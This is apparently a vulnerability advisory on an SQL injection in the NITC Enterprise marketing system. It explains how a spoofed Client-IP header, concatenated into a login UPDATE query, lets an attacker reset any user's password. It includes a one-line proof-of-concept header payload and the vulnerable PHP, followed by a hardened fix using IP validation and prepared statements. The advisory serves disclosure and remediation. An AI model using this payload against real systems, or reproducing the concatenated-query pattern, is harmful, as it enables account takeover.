NITC Enterprise Edition SQL injection allows resetting any user's password
NITC Enterprise Intelligent Marketing System
```php
function getip()
{
    if (isset($_SERVER)) {
        // Forwarding headers are supplied by the client and returned verbatim.
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
        if (isset($_SERVER['HTTP_CLIENT_IP'])) {
            return $_SERVER['HTTP_CLIENT_IP'];
        }
        return $_SERVER['REMOTE_ADDR'];
    }
    // Fallback for environments without $_SERVER: same headers via getenv().
    if (getenv("HTTP_X_FORWARDED_FOR")) {
        return getenv("HTTP_X_FORWARDED_FOR");
    }
    if (getenv("HTTP_CLIENT_IP")) {
        return getenv("HTTP_CLIENT_IP");
    }
    return getenv("REMOTE_ADDR");
}
```
The IP address returned by getip() comes from client-controlled headers (X-Forwarded-For, Client-IP) and is not filtered or validated anywhere, so every place the site writes this value into SQL is an injection point; there are several.
```php
if ($action == "login") {
    // ....
    $ip = getip();
    $_SESSION['member_email'] = $email;
    $_SESSION['member_id']    = $result['member_id'];
    $_SESSION['state']        = $result['state'];
    $_SESSION['member_name']  = $result['name'];
    // $ip is concatenated straight into the UPDATE statement, unescaped.
    $site->table("member")(
        "update " . $site->table("member")
        . " set last_ip='" . $ip . "',last_time='" . date("Y-m-d H:i:s", time())
        . "' where member_id=" . $result['member_id']
    );
}
```
When a user logs in, the login IP is written into that user's member record. Because the UPDATE statement is built by string concatenation, the injected IP value can extend the SET clause and rewrite the WHERE clause, so the password of any user can be updated directly.
POC: add the header `client-ip: ', password = '' where member_id = 1 #` to the login request.
Solution:
Filter the value returned by getip() (accept only a syntactically valid IP address) and pass it to the query as a bound parameter instead of concatenating it into the SQL string.
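As an added example (not the vendor's code), here is a hardened replacement for getip() and for the last_ip update above: the header value is validated as a literal IP address and the UPDATE uses a prepared statement. It assumes a PDO connection in `$pdo` and a plain table name `member` in place of the site's table-prefix helper; both are assumptions for this example.

```php
<?php
// Added example, not from the NITC code base. Assumes $pdo is a PDO
// connection and that the member table is literally named `member`.

// Return the client IP only if it parses as a valid IPv4/IPv6 address.
// Forwarding headers are attacker-controlled, so they are consulted only
// when $trustProxy is true (the app sits behind a proxy you control), and
// the value is validated before use. Anything else falls back to REMOTE_ADDR.
function getip_safe(bool $trustProxy = false): string
{
    $candidates = [];
    if ($trustProxy) {
        if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            // X-Forwarded-For may be a comma-separated chain; take the first hop.
            $parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            $candidates[] = trim($parts[0]);
        }
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
            $candidates[] = trim($_SERVER['HTTP_CLIENT_IP']);
        }
    }
    $candidates[] = $_SERVER['REMOTE_ADDR'] ?? '';

    foreach ($candidates as $ip) {
        // FILTER_VALIDATE_IP rejects anything that is not a literal address,
        // so a value like "', password = '' where member_id = 1 #" is dropped.
        if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
            return $ip;
        }
    }
    return '0.0.0.0';
}

// Record the login IP with a prepared statement: the values are bound as
// data and never spliced into the SQL text, so even an unvalidated string
// could not change the statement's structure.
function record_login_ip(PDO $pdo, int $memberId, string $ip): void
{
    $stmt = $pdo->prepare(
        'UPDATE member SET last_ip = :ip, last_time = :now WHERE member_id = :id'
    );
    $stmt->execute([
        ':ip'  => $ip,
        ':now' => date('Y-m-d H:i:s'),
        ':id'  => $memberId,
    ]);
}
```

Validation alone stops this particular payload, but the prepared statement is what closes the class of bug; keep both.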